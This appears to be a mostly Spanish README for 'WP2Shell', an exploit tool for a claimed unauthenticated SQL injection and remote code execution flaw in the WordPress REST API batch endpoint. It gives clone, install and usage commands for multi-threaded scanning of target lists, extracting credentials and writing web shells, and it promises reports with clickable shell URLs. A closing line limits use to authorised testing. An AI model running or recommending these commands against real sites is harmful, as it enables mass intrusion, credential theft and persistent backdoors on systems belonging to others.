
WP2Shell - CVE-2026-63030 / CVE-2026-60137 Esta herramienta explota una vulnerabilidad crítica de inyección SQL en el endpoint `/wp-json/batch/v1` de la API REST de WordPress, lo que permite a atacantes no autenticados ejecutar consultas SQL arbitrarias y lograr ejecución remota de código (RCE) en instalaciones de WordPress vulnerables.
Herramienta completa de detección y explotación para la vulnerabilidad del endpoint Batch de la API REST de WordPress.
Esta herramienta explota una vulnerabilidad crítica de inyección SQL en el endpoint /wp-json/batch/v1 de la API REST de WordPress, que permite a atacantes no autenticados ejecutar consultas SQL arbitrarias y lograr la Ejecución Remota de Código (RCE) en instalaciones de WordPress vulnerables.
Vulnerabilidad: CVE-2026-63030 / CVE-2026-60137
Vector: Inyección SQL en el endpoint Batch de la API REST de WordPress (/wp-json/batch/v1)
Impacto: RCE no autenticado
Versiones afectadas: WordPress 6.4.x y anteriores (versiones específicas por determinar)
SLEEP()ORDER BYINTO OUTFILE (cuando está permitido)# Clone the repository
git clone https://github.com/NULL200OK/wp2shell.git
cd wp2shell
# Install dependencies
pip install requests beautifulsoup4
# Create targets file
echo "https://target.com" > targets.txt
# Run discovery
python wp2shell.py targets.txt --scan --verbose
# Full exploitation
python wp2shell.py targets.txt --exploit --verbose
# Scan single target with verbose output
python wp2shell.py targets.txt --exploit --verbose
# Custom sleep time for slow servers
python wp2shell.py targets.txt --exploit --sleep 20 --verbose
# Multi-threaded scanning (20 threads)
python wp2shell.py targets.txt --exploit --threads 20 --verbose
# Skip shell writes (extract credentials only)
python wp2shell.py targets.txt --exploit --no-shell --verbose
# Force specific HTTP method
python wp2shell.py targets.txt --exploit --method POST --verbose
1- Informe JSON: Datos estructurados con el estado de la vulnerabilidad y las credenciales extraídas
2- Informe HTML: Visualización atractiva y codificada por colores con URLs de shell clicables
Esta herramienta es solo para fines educativos y de pruebas autorizadas. Úsala únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba. El autor no asume ninguna responsabilidad por el mal uso.